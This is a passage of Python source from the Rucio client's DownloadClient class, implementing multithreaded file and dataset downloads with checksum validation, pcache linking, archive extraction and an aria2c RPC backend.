return (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
        Initialises the basic settings for a DownloadClient object
        :param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
        :param logger: Optional: logging.Logger object. If None, the default logger will be used.
        :param tracing: Optional: whether traces should be sent (Default: True)
        :param check_admin: Optional: if True, check whether the account has the admin attribute and, if so, do not exclude tape RSEs (Default: False)
        :param check_pcache: Optional: if True, check pcache before downloading files (Default: False)
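
        Example (illustrative; assumes the usual rucio.client.downloadclient module path)::

            from rucio.client.downloadclient import DownloadClient
            download_client = DownloadClient(check_admin=False)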
"""
self.check_pcache = check_pcache
if not logger:
self.logger = logging.log
else:
self.logger = logger.log
self.tracing = tracing
if not self.tracing:
            self.logger(logging.DEBUG, 'Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
# if token should be used, use only JWT tokens
self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
            self.logger(logging.DEBUG, 'Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
if self.client.vo != 'def':
self.trace_tpl['vo'] = self.client.vo
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger))
self.extract_scope_convention = config_get('common', 'extract_scope', False, None)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
            adler32 - Optional: The adler32 checksum to compare the downloaded file's adler32 checksum with
            md5 - Optional: The md5 checksum to compare the downloaded file's md5 checksum with
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
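
        Example (illustrative values)::

            items = [{'did': 'user.jdoe:file.root',
                      'pfn': 'https://storage.example.org/path/user/jdoe/file.root',
                      'rse': 'EXAMPLE_DATADISK',
                      'base_dir': '/tmp/downloads'}]
            results = download_client.download_pfns(items, num_threads=2)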
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
item['input_dids'] = {DID(did_str): {}}
if not did_str or not pfn or not rse:
logger(logging.DEBUG, item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger(logging.DEBUG, did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
did_path_name = did_name
if did_name.startswith('/'):
did_path_name = did_name[1:]
dest_file_path = os.path.join(dest_dir_path, did_path_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None,
deactivate_file_download_exceptions=False, sort=None):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
impl - Optional: name of the protocol implementation to be used to download this item.
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
            nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
            ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
transfer_speed_timeout - Optional: Minimum allowed transfer speed (in KBps). Ignored if transfer_timeout set. Otherwise, used to compute default timeout (Default: 500)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:param sort: Select best replica by replica sorting algorithm. Available algorithms:
            ``geoip`` - based on src/dst IP geographical distance
``closeness`` - based on src/dst closeness
``dynamic`` - Rucio Dynamic Smart Sort (tm)
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
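
        Example (illustrative values)::

            items = [{'did': 'user.jdoe:my.dataset', 'rse': 'EXAMPLE_DATADISK', 'nrandom': 10}]
            results = download_client.download_dids(items, num_threads=4, sort='geoip')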
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items), sort=sort)
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
            ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger(logging.INFO, 'Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
for metalink in metalinks:
did = DID(metalink['did'])
did_to_options[did] = [item]
metalink['input_dids'] = {did: {}}
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(0, num_threads):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger(logging.WARNING, 'Failed to start thread %d' % thread_num)
logger(logging.DEBUG, error)
try:
logger(logging.DEBUG, 'Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
                os.killpg(os.getpgid(0), signal.SIGINT)
break
except Exception as error:
logger(logging.ERROR, '%sFailed to download item' % log_prefix)
logger(logging.DEBUG, error)
@staticmethod
def _compute_actual_transfer_timeout(item):
"""
Merge the two options related to timeout into the value which will be used for protocol download.
:param item: dictionary that describes the item to download
:return: timeout in seconds
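        Example (illustrative): a 2 GB file with transfer_speed_timeout=500 (KBps)
        and no explicit transfer_timeout yields 2e9 // (500 * 1000) + 60 = 4060 seconds.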
"""
default_transfer_timeout = 360
default_transfer_speed_timeout = 500 # KBps
# Static additive increment of the speed timeout. To include the static cost of
# establishing connections and download of small files
transfer_speed_timeout_static_increment = 60
transfer_timeout = item.get('merged_options', {}).get('transfer_timeout')
if transfer_timeout is not None:
return transfer_timeout
transfer_speed_timeout = item.get('merged_options', {}).get('transfer_speed_timeout')
bytes_ = item.get('bytes')
if not bytes_ or transfer_speed_timeout is None:
return default_transfer_timeout
if not transfer_speed_timeout > 0:
transfer_speed_timeout = default_transfer_speed_timeout
# Convert from KBytes/s to bytes/s
transfer_speed_timeout = transfer_speed_timeout * 1000
timeout = bytes_ // transfer_speed_timeout + transfer_speed_timeout_static_increment
return timeout
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
trace.setdefault('clientState', 'PROCESSING')
trace.setdefault('stateReason', 'UNKNOWN')
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
if item.get('merged_options', {}).get('check_local_with_filesize_only', False):
local_filesize = os.stat(dest_file_path).st_size
if item.get('bytes') != local_filesize:
logger(logging.INFO, '%sFile with same name exists locally, but filesize mismatches: %s' % (log_prefix, did_str))
logger(logging.DEBUG, '%slocal filesize: %d bytes, expected filesize: %d bytes' % (log_prefix, local_filesize, item.get('bytes')))
continue
elif not item.get('merged_options', {}).get('ignore_checksum', False):
verified, _, _ = _verify_checksum(item, dest_file_path)
if not verified:
logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str))
continue
logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger(logging.INFO, 'File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger(logging.INFO, 'File not found in pcache.')
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo)
except RucioException as error:
logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
transfer_timeout = self._compute_actual_transfer_timeout(item)
timeout_log_string = ""
if transfer_timeout:
timeout_log_string = " and timeout of %ds" % transfer_timeout
logger(logging.INFO, '%sTrying to download with %s%s from %s: %s ' % (log_prefix, scheme, timeout_log_string, rse_name, did_str))
impl = item.get('impl')
if impl:
logger(logging.INFO, '%sUsing Implementation (impl): %s ' % (log_prefix, impl))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, impl=impl, auth_token=self.auth_token, logger=logger)
protocol.connect()
except Exception as error:
logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
logger(logging.INFO, '%sUsing PFN: %s' % (log_prefix, pfn))
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=transfer_timeout)
success = True
except Exception as error:
logger(logging.DEBUG, error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path)
if not verified:
success = False
os.unlink(temp_file_path)
logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger(logging.WARNING, '%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
            logger(logging.INFO, 'File %s is going to be registered into pcache.' % dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
                logger(logging.INFO, 'File %s is now registered into pcache.' % first_dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger(logging.INFO, '%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}, deactivate_file_download_exceptions=False, sort=None):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It can only download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly chosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalogue. (Default: False)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:param sort: Select best replica by replica sorting algorithm. Available algorithms:
``geoip`` - based on src/dst IP topographical distance
``closeness`` - based on src/dst closeness
``dynamic`` - Rucio Dynamic Smart Sort (tm)
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
item['no_resolve_archives'] = True
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items), sort=sort)
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
# initialise output_items up front so the _check_output call below cannot
# fail with a NameError if the download raises before assigning it
output_items = []
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger(logging.ERROR, 'Unknown exception during aria2c download')
self.logger(logging.DEBUG, error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tuple with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
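# the %d/%s placeholders above are filled per attempt below: the parent PID
# (--stop-with-process), the RPC secret and a randomly chosen listen port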
logger(logging.INFO, 'Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger(logging.DEBUG, to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port)
logger(logging.DEBUG, 'aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rpc: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
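# also remember which RSE serves each PFN so the trace can later report
# the remote site of the URI that aria2c actually used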
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger(logging.INFO, 'File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger(logging.WARNING, 'No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger(logging.DEBUG, 'Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
